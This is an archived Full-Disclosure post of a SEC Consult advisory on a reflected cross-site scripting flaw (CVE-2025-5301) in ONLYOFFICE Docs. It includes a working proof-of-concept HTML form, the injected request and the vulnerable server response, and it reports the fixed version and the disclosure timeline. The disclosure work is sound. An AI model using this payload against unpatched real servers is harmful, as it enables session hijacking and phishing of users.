| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <32b2fead-09b4-4d29-b3f2-30d1920c7aa3@sec-consult.com>
Date: Thu, 12 Jun 2025 07:39:37 +0000
From: SEC Consult Vulnerability Lab via Fulldisclosure
<fulldisclosure@...lists.org>
To: "fulldisclosure@...lists.org" <fulldisclosure@...lists.org>
Subject: [FD] SEC Consult SA-20250612-0 :: Reflected Cross-Site Scripting in
ONLYOFFICE Docs (DocumentServer)
SEC Consult Vulnerability Lab Security Advisory < 20250612-0 >
=======================================================================
title: Reflected Cross-Site Scripting
product: ONLYOFFICE Docs (DocumentServer)
vulnerable version: <=8.3.1
fixed version: 8.3.2 or higher
CVE number: CVE-2025-5301
impact: Medium
homepage: https://www.onlyoffice.com/
https://github.com/ONLYOFFICE/DocumentServer/
found: 2025-02-14
by: Max Rull
SEC Consult Vulnerability Lab
An integrated part of SEC Consult, an Eviden business
Europe | Asia
https://www.sec-consult.com
=======================================================================
Vendor description:
-------------------
"ONLYOFFICE Docs* is a free collaborative online office suite comprising
viewers and editors for texts, spreadsheets and presentations, forms and
PDF, fully compatible with Office Open XML formats:
.docx, .xlsx, .pptx and enabling collaborative editing in real time.
ONLYOFFICE Docs can be used as a part of ONLYOFFICE Workspace or with
third-party sync&share solutions (e.g. Nextcloud, ownCloud, Seafile) to
enable collaborative editing within their interface. It has three editions
- Community, Enterprise, and Developer.
* Starting from version 6.0, Document Server is distributed under a
new name - ONLYOFFICE Docs."
Source: https://github.com/ONLYOFFICE/DocumentServer
Business recommendation:
------------------------
The vendor provides a patched version v8.3.2 (or higher) which should be
installed immediately.
SEC Consult highly recommends to perform a thorough security review of the
product conducted by security professionals to identify and resolve potential
further security issues.
Vulnerability overview/description:
-----------------------------------
1) Reflected XSS via arbitrary query parameters (CVE-2025-5301)
An XSS vulnerability exists in the /hosting/wopi/:documentType/:mode
endpoint due to improper sanitization of user-controlled query parameters.
Attackers can inject malicious scripts via crafted HTTP POST requests,
which are reflected in the server's HTML response.
Technical flow:
- The Express.js handler (wopiClient.getEditorHtml) passes raw query
parameters (req.query) to the rendering context without sanitization.
Code reference (server.js line 283):
https://github.com/ONLYOFFICE/server/blob/02ae05c/DocService/sources/server.js#L283
- Unsafe parameter handling by directly reading from req.query (wopiClient.js line 573):
https://github.com/ONLYOFFICE/server/blob/02ae05c/DocService/sources/wopiClient.js#L573
- Template injection in editor-wopi.ejs (line 292) embeds parameters via:
var queryParams = <%- JSON.stringify(queryParams) %>;
Code reference (editor-wopi.ejs line 292):
https://github.com/ONLYOFFICE/web-apps/blob/090ef83/apps/api/wopi/editor-wopi.ejs#L292
Impact:
- Execution of attacker-controlled scripts in victim's browser
- Session hijacking, phishing attacks, or UI manipulation
- Risks compounded by missing CSP/X-Frame-Options headers
Proof of concept:
-----------------
1) Reflected XSS via arbitrary query parameters (CVE-2025-5301)
To demonstrate the vulnerability, it is sufficient to open the following
HTML document in a browser:
```
<html>
<body>
<form action="https://one.office.example.com/hosting/wopi/word/edit?dchat=asdasd</script><script>alert('XSS')</script>" method="POST">
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>
```
When opening the HTML document, it automatically issues an HTTP POST request to the
OnlyOffice Docs server located at one.office.example.com. Because the requested
API endpoint does not require any authentication and has no anti-CSRF mechanisms
or CSP in place, the browser will display the response and execute the reflected
JavaScript code. As the content of any chosen query parameter gets reflected,
the parameter "dchat" can be chosen to inject the JavaScript payload into.
The following request gets sent when opening the HTML document triggered by the
POST form:
```
POST /hosting/wopi/word/edit?dchat=asdasd</script><script>alert('XSS')</script> HTTP/1.1
Host: one.office.example.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
```
The server responds with the following HTML document:
```
HTTP/2 200 OK
Date: Fri, 14 Feb 2025 14:43:44 GMT
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Etag: W/"6716-b+9JJ5PtBd9kmLY/ZdhVwyGtBc"
Strict-Transport-Security: max-age=31536000; includeSubDomains
<!DOCTYPE html>
<html>
<head runat="server">
[...]
var queryParams = {"dchat":"asdasd</script><script>alert('XSS')</script>"};
[...]
</head>
<body>
[...]
</body>
</html>
```
When the response is rendered in the victim's browser, the injected
JavaScript payload (`alert('XSS')`) is executed.
<xss_poc.png>
Vulnerable / tested versions:
-----------------------------
The following version has been tested and confirmed to be vulnerable:
* ONLYOFFICE DocumentServer 8.3.1 (latest release at the time of testing)
Release details: https://github.com/ONLYOFFICE/DocumentServer/releases/tag/v8.3.1
Vendor contact timeline:
------------------------
2025-03-06: Contacting vendor through marketing@...yoffice.com (to request
HackerOne access according to ONLYOFFICE blog)
2025-03-08: Resending initial contact email to security@...yoffice.com as well,
preferring email contact instead of HackerOne.
2025-03-10: Vendor invites us to bounty program. We follow-up regarding HackerOne
policies.
2025-03-14: Submitting advisory via HackerOne.
2025-03-27: Vendor responds that they are already working on it and keep us
informed. A second message mentions that a fix has been commited to
version 8.3.2 branch.
2025-03-27: Verified that patch is fixing the issue.
2025-03-31: Asking vendor to schedule the release of the advisory and who will
assign CVE number.
2025-04-04: Vendor tells us we can assign a CVE and closes the ticket.
2025-06-12: Public release of security advisory.
Solution:
---------
The vendor provides a patched version v8.3.2 (or higher) which can be downloaded
from:
https://github.com/ONLYOFFICE/DocumentServer/
Workaround:
-----------
None
Advisory URL:
-------------
https://sec-consult.com/vulnerability-lab/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
An integrated part of SEC Consult, an Eviden business
Europe | Asia
About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an
Eviden business. It ensures the continued knowledge gain of SEC Consult in the
field of network and application security to stay ahead of the attacker. The
SEC Consult Vulnerability Lab supports high-quality penetration testing and
the evaluation of new offensive and defensive technologies for our customers.
Hence our customers obtain the most current information about vulnerabilities
and valid recommendation about the risk profile of new technologies.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://sec-consult.com/career/
Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://sec-consult.com/contact/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Mail: security-research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: https://blog.sec-consult.com
X: https://x.com/sec_consult
EOF M. Rull / @2025
Download attachment "xss_poc.png" of type "image/png" (276725 bytes)
Download attachment "smime.p7s" of type "application/pkcs7-signature" (4438 bytes)
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/
Powered by blists - more mailing lists